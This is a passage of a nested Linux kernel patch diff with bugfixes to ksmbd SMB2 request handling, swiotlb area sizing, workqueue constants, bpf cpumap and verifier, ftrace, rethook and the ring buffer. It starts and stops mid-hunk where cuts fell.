++	struct smb2_tree_connect_req *req;
++	struct smb2_tree_connect_rsp *rsp;
+ 	struct ksmbd_session *sess = work->sess;
+ 	char *treename = NULL, *name = NULL;
+ 	struct ksmbd_tree_conn_status status;
+ 	struct ksmbd_share_config *share;
+ 	int rc = -EINVAL;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	treename = smb_strndup_from_utf16(req->Buffer,
+ 					  le16_to_cpu(req->PathLength), true,
+ 					  conn->local_nls);
+@@ -2102,19 +2107,19 @@ static int smb2_create_open_flags(bool file_present, __le32 access,
+  */
+ int smb2_tree_disconnect(struct ksmbd_work *work)
+ {
+-	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_tree_disconnect_rsp *rsp;
++	struct smb2_tree_disconnect_req *req;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+ 	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+-		struct smb2_tree_disconnect_req *req =
+-			smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+@@ -2137,10 +2142,14 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_logoff_req *req;
++	struct smb2_logoff_rsp *rsp;
+ 	struct ksmbd_session *sess;
+-	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++	u64 sess_id;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+@@ -2180,12 +2189,14 @@ int smb2_session_logoff(struct ksmbd_work *work)
+  */
+ static noinline int create_smb2_pipe(struct ksmbd_work *work)
+ {
+-	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_create_rsp *rsp;
++	struct smb2_create_req *req;
+ 	int id;
+ 	int err;
+ 	char *name;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
+ 				      1, work->conn->local_nls);
+ 	if (IS_ERR(name)) {
+@@ -5321,8 +5332,10 @@ int smb2_query_info(struct ksmbd_work *work)
+ static noinline int smb2_close_pipe(struct ksmbd_work *work)
+ {
+ 	u64 id;
+-	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_close_req *req;
++	struct smb2_close_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	id = req->VolatileFileId;
+ 	ksmbd_session_rpc_close(work->sess, id);
+@@ -5464,6 +5477,9 @@ int smb2_echo(struct ksmbd_work *work)
+ {
+ 	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
+ 
++	if (work->next_smb2_rcv_hdr_off)
++		rsp = ksmbd_resp_buf_next(work);
++
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+ 	inc_rfc1001_len(work->response_buf, 4);
+@@ -6178,8 +6194,10 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 	int nbytes = 0, err;
+ 	u64 id;
+ 	struct ksmbd_rpc_command *rpc_resp;
+-	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_read_req *req;
++	struct smb2_read_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	id = req->VolatileFileId;
+ 
+@@ -6427,14 +6445,16 @@ out:
+  */
+ static noinline int smb2_write_pipe(struct ksmbd_work *work)
+ {
+-	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_write_req *req;
++	struct smb2_write_rsp *rsp;
+ 	struct ksmbd_rpc_command *rpc_resp;
+ 	u64 id = 0;
+ 	int err = 0, ret = 0;
+ 	char *data_buf;
+ 	size_t length;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	length = le32_to_cpu(req->Length);
+ 	id = req->VolatileFileId;
+ 
+@@ -6703,6 +6723,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+ 		    hdr->MessageId, hdr->Flags);
+ 
+@@ -6862,8 +6885,8 @@ static inline bool lock_defer_pending(struct file_lock *fl)
+  */
+ int smb2_lock(struct ksmbd_work *work)
+ {
+-	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lock_req *req;
++	struct smb2_lock_rsp *rsp;
+ 	struct smb2_lock_element *lock_ele;
+ 	struct ksmbd_file *fp = NULL;
+ 	struct file_lock *flock = NULL;
+@@ -6880,6 +6903,8 @@ int smb2_lock(struct ksmbd_work *work)
+ 	LIST_HEAD(rollback_list);
+ 	int prior_lock = 0;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	ksmbd_debug(SMB, "Received lock request\n");
+ 	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+ 	if (!fp) {
+@@ -7992,8 +8017,8 @@ out:
+  */
+ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ {
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_oplock_break *req;
++	struct smb2_oplock_break *rsp;
+ 	struct ksmbd_file *fp;
+ 	struct oplock_info *opinfo = NULL;
+ 	__le32 err = 0;
+@@ -8002,6 +8027,8 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 	char req_oplevel = 0, rsp_oplevel = 0;
+ 	unsigned int oplock_change_type;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	volatile_id = req->VolatileFid;
+ 	persistent_id = req->PersistentFid;
+ 	req_oplevel = req->OplockLevel;
+@@ -8136,8 +8163,8 @@ static int check_lease_state(struct lease *lease, __le32 req_state)
+ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lease_ack *req;
++	struct smb2_lease_ack *rsp;
+ 	struct oplock_info *opinfo;
+ 	__le32 err = 0;
+ 	int ret = 0;
+@@ -8145,6 +8172,8 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 	__le32 lease_state;
+ 	struct lease *lease;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
+ 		    le32_to_cpu(req->LeaseState));
+ 	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
+@@ -8270,8 +8299,10 @@ err_out:
+  */
+ int smb2_oplock_break(struct ksmbd_work *work)
+ {
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_oplock_break *req;
++	struct smb2_oplock_break *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	switch (le16_to_cpu(req->StructureSize)) {
+ 	case OP_BREAK_STRUCT_SIZE_20:
+diff --git a/include/linux/blk-crypto-profile.h b/include/linux/blk-crypto-profile.h
+index e6802b69cdd64..90ab33cb5d0ef 100644
+--- a/include/linux/blk-crypto-profile.h
++++ b/include/linux/blk-crypto-profile.h
+@@ -111,6 +111,7 @@ struct blk_crypto_profile {
+ 	 * keyslots while ensuring that they can't be changed concurrently.
+ 	 */
+ 	struct rw_semaphore lock;
++	struct lock_class_key lockdep_key;
+ 
+ 	/* List of idle slots, with least recently used slot at front */
+ 	wait_queue_head_t idle_slots_wait_queue;
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index d9fbc5afeaf72..e6fb36b71b59d 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -473,7 +473,7 @@ struct nvme_id_ns_nvm {
+ };
+ 
+ enum {
+-	NVME_ID_NS_NVM_STS_MASK		= 0x3f,
++	NVME_ID_NS_NVM_STS_MASK		= 0x7f,
+ 	NVME_ID_NS_NVM_GUARD_SHIFT	= 7,
+ 	NVME_ID_NS_NVM_GUARD_MASK	= 0x3,
+ };
+diff --git a/include/linux/rethook.h b/include/linux/rethook.h
+index c8ac1e5afcd1d..bdbe6717f45a2 100644
+--- a/include/linux/rethook.h
++++ b/include/linux/rethook.h
+@@ -59,6 +59,7 @@ struct rethook_node {
+ };
+ 
+ struct rethook *rethook_alloc(void *data, rethook_handler_t handler);
++void rethook_stop(struct rethook *rh);
+ void rethook_free(struct rethook *rh);
+ void rethook_add_node(struct rethook *rh, struct rethook_node *node);
+ struct rethook_node *rethook_try_get(struct rethook *rh);
+diff --git a/include/linux/serial_8250.h b/include/linux/serial_8250.h
+index 19376bee96676..79b328861c5fa 100644
+--- a/include/linux/serial_8250.h
++++ b/include/linux/serial_8250.h
+@@ -98,7 +98,6 @@ struct uart_8250_port {
+ 	struct list_head	list;		/* ports on this IRQ */
+ 	u32			capabilities;	/* port capabilities */
+ 	unsigned short		bugs;		/* port bugs */
+-	bool			fifo_bug;	/* min RX trigger if enabled */
+ 	unsigned int		tx_loadsz;	/* transmit fifo load size */
+ 	unsigned char		acr;
+ 	unsigned char		fcr;
+diff --git a/include/linux/workqueue.h b/include/linux/workqueue.h
+index a0143dd244300..3ca41b9da6473 100644
+--- a/include/linux/workqueue.h
++++ b/include/linux/workqueue.h
+@@ -68,7 +68,6 @@ enum {
+ 	WORK_OFFQ_FLAG_BASE	= WORK_STRUCT_COLOR_SHIFT,
+ 
+ 	__WORK_OFFQ_CANCELING	= WORK_OFFQ_FLAG_BASE,
+-	WORK_OFFQ_CANCELING	= (1 << __WORK_OFFQ_CANCELING),
+ 
+ 	/*
+ 	 * When a work item is off queue, its high bits point to the last
+@@ -79,12 +78,6 @@ enum {
+ 	WORK_OFFQ_POOL_SHIFT	= WORK_OFFQ_FLAG_BASE + WORK_OFFQ_FLAG_BITS,
+ 	WORK_OFFQ_LEFT		= BITS_PER_LONG - WORK_OFFQ_POOL_SHIFT,
+ 	WORK_OFFQ_POOL_BITS	= WORK_OFFQ_LEFT <= 31 ? WORK_OFFQ_LEFT : 31,
+-	WORK_OFFQ_POOL_NONE	= (1LU << WORK_OFFQ_POOL_BITS) - 1,
+-
+-	/* convenience constants */
+-	WORK_STRUCT_FLAG_MASK	= (1UL << WORK_STRUCT_FLAG_BITS) - 1,
+-	WORK_STRUCT_WQ_DATA_MASK = ~WORK_STRUCT_FLAG_MASK,
+-	WORK_STRUCT_NO_POOL	= (unsigned long)WORK_OFFQ_POOL_NONE << WORK_OFFQ_POOL_SHIFT,
+ 
+ 	/* bit mask for work_busy() return values */
+ 	WORK_BUSY_PENDING	= 1 << 0,
+@@ -94,6 +87,14 @@ enum {
+ 	WORKER_DESC_LEN		= 24,
+ };
+ 
++/* Convenience constants - of type 'unsigned long', not 'enum'! */
++#define WORK_OFFQ_CANCELING	(1ul << __WORK_OFFQ_CANCELING)
++#define WORK_OFFQ_POOL_NONE	((1ul << WORK_OFFQ_POOL_BITS) - 1)
++#define WORK_STRUCT_NO_POOL	(WORK_OFFQ_POOL_NONE << WORK_OFFQ_POOL_SHIFT)
++
++#define WORK_STRUCT_FLAG_MASK    ((1ul << WORK_STRUCT_FLAG_BITS) - 1)
++#define WORK_STRUCT_WQ_DATA_MASK (~WORK_STRUCT_FLAG_MASK)
++
+ struct work_struct {
+ 	atomic_long_t data;
+ 	struct list_head entry;
+diff --git a/include/net/pkt_sched.h b/include/net/pkt_sched.h
+index 8ab75128512ab..f99a513b40a92 100644
+--- a/include/net/pkt_sched.h
++++ b/include/net/pkt_sched.h
+@@ -135,7 +135,7 @@ extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
+  */
+ static inline unsigned int psched_mtu(const struct net_device *dev)
+ {
+-	return dev->mtu + dev->hard_header_len;
++	return READ_ONCE(dev->mtu) + dev->hard_header_len;
+ }
+ 
+ static inline struct net *qdisc_net(struct Qdisc *q)
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index b5ba34ddd4b64..09141351d5457 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -127,22 +127,6 @@ static void get_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ 	atomic_inc(&rcpu->refcnt);
+ }
+ 
+-/* called from workqueue, to workaround syscall using preempt_disable */
+-static void cpu_map_kthread_stop(struct work_struct *work)
+-{
+-	struct bpf_cpu_map_entry *rcpu;
+-
+-	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
+-
+-	/* Wait for flush in __cpu_map_entry_free(), via full RCU barrier,
+-	 * as it waits until all in-flight call_rcu() callbacks complete.
+-	 */
+-	rcu_barrier();
+-
+-	/* kthread_stop will wake_up_process and wait for it to complete */
+-	kthread_stop(rcpu->kthread);
+-}
+-
+ static void __cpu_map_ring_cleanup(struct ptr_ring *ring)
+ {
+ 	/* The tear-down procedure should have made sure that queue is
+@@ -170,6 +154,30 @@ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ 	}
+ }
+ 
++/* called from workqueue, to workaround syscall using preempt_disable */
++static void cpu_map_kthread_stop(struct work_struct *work)
++{
++	struct bpf_cpu_map_entry *rcpu;
++	int err;
++
++	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
++
++	/* Wait for flush in __cpu_map_entry_free(), via full RCU barrier,
++	 * as it waits until all in-flight call_rcu() callbacks complete.
++	 */
++	rcu_barrier();
++
++	/* kthread_stop will wake_up_process and wait for it to complete */
++	err = kthread_stop(rcpu->kthread);
++	if (err) {
++		/* kthread_stop may be called before cpu_map_kthread_run
++		 * is executed, so we need to release the memory related
++		 * to rcpu.
++		 */
++		put_cpu_map_entry(rcpu);
++	}
++}
++
+ static void cpu_map_bpf_prog_run_skb(struct bpf_cpu_map_entry *rcpu,
+ 				     struct list_head *listp,
+ 				     struct xdp_cpumap_stats *stats)
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 49c6b5e0855cd..8c3ededef3172 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -4357,8 +4357,9 @@ continue_func:
+ 				verbose(env, "verifier bug. subprog has tail_call and async cb\n");
+ 				return -EFAULT;
+ 			}
+-			 /* async callbacks don't increase bpf prog stack size */
+-			continue;
++			/* async callbacks don't increase bpf prog stack size unless called directly */
++			if (!bpf_pseudo_call(insn + i))
++				continue;
+ 		}
+ 		i = next_insn;
+ 
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index 7f4ad5e70b40c..ad6333c3fe1ff 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -117,9 +117,16 @@ static bool round_up_default_nslabs(void)
+ 	return true;
+ }
+ 
++/**
++ * swiotlb_adjust_nareas() - adjust the number of areas and slots
++ * @nareas:	Desired number of areas. Zero is treated as 1.
++ *
++ * Adjust the default number of areas in a memory pool.
++ * The default size of the memory pool may also change to meet minimum area
++ * size requirements.
++ */
+ static void swiotlb_adjust_nareas(unsigned int nareas)
+ {
+-	/* use a single area when non is specified */
+ 	if (!nareas)
+ 		nareas = 1;
+ 	else if (!is_power_of_2(nareas))
+@@ -133,6 +140,23 @@ static void swiotlb_adjust_nareas(unsigned int nareas)
+ 			(default_nslabs << IO_TLB_SHIFT) >> 20);
+ }
+ 
++/**
++ * limit_nareas() - get the maximum number of areas for a given memory pool size
++ * @nareas:	Desired number of areas.
++ * @nslots:	Total number of slots in the memory pool.
++ *
++ * Limit the number of areas to the maximum possible number of areas in
++ * a memory pool of the given size.
++ *
++ * Return: Maximum possible number of areas.
++ */
++static unsigned int limit_nareas(unsigned int nareas, unsigned long nslots)
++{
++	if (nslots < nareas * IO_TLB_SEGSIZE)
++		return nslots / IO_TLB_SEGSIZE;
++	return nareas;
++}
++
+ static int __init
+ setup_io_tlb_npages(char *str)
+ {
+@@ -300,6 +324,38 @@ static void swiotlb_init_io_tlb_mem(struct io_tlb_mem *mem, phys_addr_t start,
+ 	return;
+ }
+ 
++static void __init *swiotlb_memblock_alloc(unsigned long nslabs,
++		unsigned int flags,
++		int (*remap)(void *tlb, unsigned long nslabs))
++{
++	size_t bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
++	void *tlb;
++
++	/*
++	 * By default allocate the bounce buffer memory from low memory, but
++	 * allow to pick a location everywhere for hypervisors with guest
++	 * memory encryption.
++	 */
++	if (flags & SWIOTLB_ANY)
++		tlb = memblock_alloc(bytes, PAGE_SIZE);
++	else
++		tlb = memblock_alloc_low(bytes, PAGE_SIZE);
++
++	if (!tlb) {
++		pr_warn("%s: Failed to allocate %zu bytes tlb structure\n",
++			__func__, bytes);
++		return NULL;
++	}
++
++	if (remap && remap(tlb, nslabs) < 0) {
++		memblock_free(tlb, PAGE_ALIGN(bytes));
++		pr_warn("%s: Failed to remap %zu bytes\n", __func__, bytes);
++		return NULL;
++	}
++
++	return tlb;
++}
++
+ /*
+  * Statically reserve bounce buffer space and initialize bounce buffer data
+  * structures for the software IO TLB used to implement the DMA API.
+@@ -309,8 +365,8 @@ void __init swiotlb_init_remap(bool addressing_limit, unsigned int flags,
+ {
+ 	struct io_tlb_mem *mem = &io_tlb_default_mem;
+ 	unsigned long nslabs;
++	unsigned int nareas;
+ 	size_t alloc_size;
+-	size_t bytes;
+ 	void *tlb;
+ 
+ 	if (!addressing_limit && !swiotlb_force_bounce)
+@@ -318,39 +374,22 @@ void __init swiotlb_init_remap(bool addressing_limit, unsigned int flags,
+ 	if (swiotlb_force_disable)
+ 		return;
+ 
+-	/*
+-	 * default_nslabs maybe changed when adjust area number.
+-	 * So allocate bounce buffer after adjusting area number.
+-	 */
+ 	if (!default_nareas)
+ 		swiotlb_adjust_nareas(num_possible_cpus());
+ 
+ 	nslabs = default_nslabs;
+-	/*
+-	 * By default allocate the bounce buffer memory from low memory, but
+-	 * allow to pick a location everywhere for hypervisors with guest
+-	 * memory encryption.
+-	 */
+-retry:
+-	bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
+-	if (flags & SWIOTLB_ANY)
+-		tlb = memblock_alloc(bytes, PAGE_SIZE);
+-	else
+-		tlb = memblock_alloc_low(bytes, PAGE_SIZE);
+-	if (!tlb) {
+-		pr_warn("%s: failed to allocate tlb structure\n", __func__);
+-		return;
+-	}
+-
+-	if (remap && remap(tlb, nslabs) < 0) {
+-		memblock_free(tlb, PAGE_ALIGN(bytes));
+-
++	nareas = limit_nareas(default_nareas, nslabs);
++	while ((tlb = swiotlb_memblock_alloc(nslabs, flags, remap)) == NULL) {
++		if (nslabs <= IO_TLB_MIN_SLABS)
++			return;
+ 		nslabs = ALIGN(nslabs >> 1, IO_TLB_SEGSIZE);
+-		if (nslabs >= IO_TLB_MIN_SLABS)
+-			goto retry;
++		nareas = limit_nareas(nareas, nslabs);
++	}
+ 
+-		pr_warn("%s: Failed to remap %zu bytes\n", __func__, bytes);
+-		return;
++	if (default_nslabs != nslabs) {
++		pr_info("SWIOTLB bounce buffer size adjusted %lu -> %lu slabs",
++			default_nslabs, nslabs);
++		default_nslabs = nslabs;
+ 	}
+ 
+ 	alloc_size = PAGE_ALIGN(array_size(sizeof(*mem->slots), nslabs));
+@@ -390,6 +429,7 @@ int swiotlb_init_late(size_t size, gfp_t gfp_mask,
+ {
+ 	struct io_tlb_mem *mem = &io_tlb_default_mem;
+ 	unsigned long nslabs = ALIGN(size >> IO_TLB_SHIFT, IO_TLB_SEGSIZE);
++	unsigned int nareas;
+ 	unsigned char *vstart = NULL;
+ 	unsigned int order, area_order;
+ 	bool retried = false;
+@@ -398,6 +438,9 @@ int swiotlb_init_late(size_t size, gfp_t gfp_mask,
+ 	if (swiotlb_force_disable)
+ 		return 0;
+ 
++	if (!default_nareas)
++		swiotlb_adjust_nareas(num_possible_cpus());
++
+ retry:
+ 	order = get_order(nslabs << IO_TLB_SHIFT);
+ 	nslabs = SLABS_PER_PAGE << order;
+@@ -432,11 +475,8 @@ retry:
+ 			(PAGE_SIZE << order) >> 20);
+ 	}
+ 
+-	if (!default_nareas)
+-		swiotlb_adjust_nareas(num_possible_cpus());
+-
+-	area_order = get_order(array_size(sizeof(*mem->areas),
+-		default_nareas));
++	nareas = limit_nareas(default_nareas, nslabs);
++	area_order = get_order(array_size(sizeof(*mem->areas), nareas));
+ 	mem->areas = (struct io_tlb_area *)
+ 		__get_free_pages(GFP_KERNEL | __GFP_ZERO, area_order);
+ 	if (!mem->areas)
+@@ -450,7 +490,7 @@ retry:
+ 	set_memory_decrypted((unsigned long)vstart,
+ 			     (nslabs << IO_TLB_SHIFT) >> PAGE_SHIFT);
+ 	swiotlb_init_io_tlb_mem(mem, virt_to_phys(vstart), nslabs, 0, true,
+-				default_nareas);
++				nareas);
+ 
+ 	swiotlb_print_info();
+ 	return 0;
+diff --git a/kernel/power/qos.c b/kernel/power/qos.c
+index af51ed6d45ef1..782d3b41c1f35 100644
+--- a/kernel/power/qos.c
++++ b/kernel/power/qos.c
+@@ -426,6 +426,11 @@ late_initcall(cpu_latency_qos_init);
+ 
+ /* Definitions related to the frequency QoS below. */
+ 
++static inline bool freq_qos_value_invalid(s32 value)
++{
++	return value < 0 && value != PM_QOS_DEFAULT_VALUE;
++}
++
+ /**
+  * freq_constraints_init - Initialize frequency QoS constraints.
+  * @qos: Frequency QoS constraints to initialize.
+@@ -531,7 +536,7 @@ int freq_qos_add_request(struct freq_constraints *qos,
+ {
+ 	int ret;
+ 
+-	if (IS_ERR_OR_NULL(qos) || !req || value < 0)
++	if (IS_ERR_OR_NULL(qos) || !req || freq_qos_value_invalid(value))
+ 		return -EINVAL;
+ 
+ 	if (WARN(freq_qos_request_active(req),
+@@ -563,7 +568,7 @@ EXPORT_SYMBOL_GPL(freq_qos_add_request);
+  */
+ int freq_qos_update_request(struct freq_qos_request *req, s32 new_value)
+ {
+-	if (!req || new_value < 0)
++	if (!req || freq_qos_value_invalid(new_value))
+ 		return -EINVAL;
+ 
+ 	if (WARN(!freq_qos_request_active(req),
+diff --git a/kernel/trace/fprobe.c b/kernel/trace/fprobe.c
+index e8143e3680744..1322247ce6488 100644
+--- a/kernel/trace/fprobe.c
++++ b/kernel/trace/fprobe.c
+@@ -307,19 +307,16 @@ int unregister_fprobe(struct fprobe *fp)
+ 		    fp->ops.saved_func != fprobe_kprobe_handler))
+ 		return -EINVAL;
+ 
+-	/*
+-	 * rethook_free() starts disabling the rethook, but the rethook handlers
+-	 * may be running on other processors at this point. To make sure that all
+-	 * current running handlers are finished, call unregister_ftrace_function()
+-	 * after this.
+-	 */
+ 	if (fp->rethook)
+-		rethook_free(fp->rethook);
++		rethook_stop(fp->rethook);
+ 
+ 	ret = unregister_ftrace_function(&fp->ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (fp->rethook)
++		rethook_free(fp->rethook);
++
+ 	ftrace_free_filter(&fp->ops);
+ 
+ 	return ret;
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 57db50c2dce80..552956ccb91c8 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -3213,6 +3213,22 @@ static int ftrace_allocate_records(struct ftrace_page *pg, int count)
+ 	return cnt;
+ }
+ 
++static void ftrace_free_pages(struct ftrace_page *pages)
++{
++	struct ftrace_page *pg = pages;
++
++	while (pg) {
++		if (pg->records) {
++			free_pages((unsigned long)pg->records, pg->order);
++			ftrace_number_of_pages -= 1 << pg->order;
++		}
++		pages = pg->next;
++		kfree(pg);
++		pg = pages;
++		ftrace_number_of_groups--;
++	}
++}
++
+ static struct ftrace_page *
+ ftrace_allocate_pages(unsigned long num_to_init)
+ {
+@@ -3251,17 +3267,7 @@ ftrace_allocate_pages(unsigned long num_to_init)
+ 	return start_pg;
+ 
+  free_pages:
+-	pg = start_pg;
+-	while (pg) {
+-		if (pg->records) {
+-			free_pages((unsigned long)pg->records, pg->order);
+-			ftrace_number_of_pages -= 1 << pg->order;
+-		}
+-		start_pg = pg->next;
+-		kfree(pg);
+-		pg = start_pg;
+-		ftrace_number_of_groups--;
+-	}
++	ftrace_free_pages(start_pg);
+ 	pr_info("ftrace: FAILED to allocate memory for functions\n");
+ 	return NULL;
+ }
+@@ -6666,9 +6672,11 @@ static int ftrace_process_locs(struct module *mod,
+ 			       unsigned long *start,
+ 			       unsigned long *end)
+ {
++	struct ftrace_page *pg_unuse = NULL;
+ 	struct ftrace_page *start_pg;
+ 	struct ftrace_page *pg;
+ 	struct dyn_ftrace *rec;
++	unsigned long skipped = 0;
+ 	unsigned long count;
+ 	unsigned long *p;
+ 	unsigned long addr;
+@@ -6731,8 +6739,10 @@ static int ftrace_process_locs(struct module *mod,
+ 		 * object files to satisfy alignments.
+ 		 * Skip any NULL pointers.
+ 		 */
+-		if (!addr)
++		if (!addr) {
++			skipped++;
+ 			continue;
++		}
+ 
+ 		end_offset = (pg->index+1) * sizeof(pg->records[0]);
+ 		if (end_offset > PAGE_SIZE << pg->order) {
+@@ -6746,8 +6756,10 @@ static int ftrace_process_locs(struct module *mod,
+ 		rec->ip = addr;
+ 	}
+ 
+-	/* We should have used all pages */
+-	WARN_ON(pg->next);
++	if (pg->next) {
++		pg_unuse = pg->next;
++		pg->next = NULL;
++	}
+ 
+ 	/* Assign the last page to ftrace_pages */
+ 	ftrace_pages = pg;
+@@ -6769,6 +6781,11 @@ static int ftrace_process_locs(struct module *mod,
+  out:
+ 	mutex_unlock(&ftrace_lock);
+ 
++	/* We should have used all pages unless we skipped some */
++	if (pg_unuse) {
++		WARN_ON(!skipped);
++		ftrace_free_pages(pg_unuse);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 60f6cb2b486bf..468006cce7cae 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -53,6 +53,19 @@ static void rethook_free_rcu(struct rcu_head *head)
+ 		kfree(rh);
+ }
+ 
++/**
++ * rethook_stop() - Stop using a rethook.
++ * @rh: the struct rethook to stop.
++ *
++ * Stop using a rethook to prepare for freeing it. If you want to wait for
++ * all running rethook handler before calling rethook_free(), you need to
++ * call this first and wait RCU, and call rethook_free().
++ */
++void rethook_stop(struct rethook *rh)
++{
++	WRITE_ONCE(rh->handler, NULL);
++}
++
+ /**
+  * rethook_free() - Free struct rethook.
+  * @rh: the struct rethook to be freed.
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 4acc27cb856f8..c264421c4ecd8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5238,28 +5238,34 @@ unsigned long ring_buffer_size(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_size);
+ 
++static void rb_clear_buffer_page(struct buffer_page *page)
++{
++	local_set(&page->write, 0);
++	local_set(&page->entries, 0);
++	rb_init_page(page->page);
++	page->read = 0;
++}
++
+ static void
+ rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
+ {
++	struct buffer_page *page;
++
+ 	rb_head_page_deactivate(cpu_buffer);
+ 
+ 	cpu_buffer->head_page
+ 		= list_entry(cpu_buffer->pages, struct buffer_page, list);
+-	local_set(&cpu_buffer->head_page->write, 0);
+-	local_set(&cpu_buffer->head_page->entries, 0);
+-	local_set(&cpu_buffer->head_page->page->commit, 0);
+-
+-	cpu_buffer->head_page->read = 0;
++	rb_clear_buffer_page(cpu_buffer->head_page);
++	list_for_each_entry(page, cpu_buffer->pages, list) {
++		rb_clear_buffer_page(page);
++	}
+ 
+ 	cpu_buffer->tail_page = cpu_buffer->head_page;
+ 	cpu_buffer->commit_page = cpu_buffer->head_page;
+ 
+ 	INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
+ 	INIT_LIST_HEAD(&cpu_buffer->new_pages);
+-	local_set(&cpu_buffer->reader_page->write, 0);
+-	local_set(&cpu_buffer->reader_page->entries, 0);
+-	local_set(&cpu_buffer->reader_page->page->commit, 0);
+-	cpu_buffer->reader_page->read = 0;
++	rb_clear_buffer_page(cpu_buffer->reader_page);
+ 
+ 	local_set(&cpu_buffer->entries_bytes, 0);
+ 	local_set(&cpu_buffer->overrun, 0);
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 5c1087df2f1c4..27bbe180a2ef2 100644
